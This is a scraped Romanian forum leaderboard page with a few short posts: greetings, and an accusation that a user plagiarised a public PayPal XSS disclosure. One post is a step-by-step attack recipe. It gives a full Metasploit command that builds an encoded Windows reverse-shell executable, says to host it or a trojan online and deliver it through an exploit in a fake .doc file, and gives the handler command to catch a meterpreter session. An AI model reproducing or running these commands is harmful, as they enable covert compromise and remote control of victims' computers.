Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 05/27/13 in all areas

  1. Bun venit,frumos blog-ul!
    1 point
  2. Salut si tie! Si respecte din partea mea.
    1 point
  3. 1.Creezi payload.exe cu metasploit local msfpayload windows/shell/reverse_tcp LHOST=192.168.206.129 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o /root/Desktop/payload.exe sau folosesti trojan server.exe 2.Urci serverul.exe pe un hosting gratis online 3.Folosesti exploitul in python 4.Daca ai folosit server trojan il chemi cu trojan respectiv 5.Cu metasploit msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.206.129 E O problema este ca tipul care a facut exploitul nu a creat heder corect de la fisierul tip format .doc ca sa fie cit mai exact ca un document.doc Si daca ai fantezie buna poti combina cu mai multe posibilitati
    1 point
  4. Tu pe cine incerci sa prostesti aici ? Acest xss a fost gasit de un tanar de 17 ani care nu a fost acceptat in programul bug-bounty de la PP. Si probabil s-a ofticat si a postat vulnerabilitatea pe net : Full Disclosure: PayPal.com XSS Vulnerability . Iar tu, ca un bun xerox l-ai luat si ti-ai acordat credite. Lasa-te(ne) !
    -1 points
×
×
  • Create New...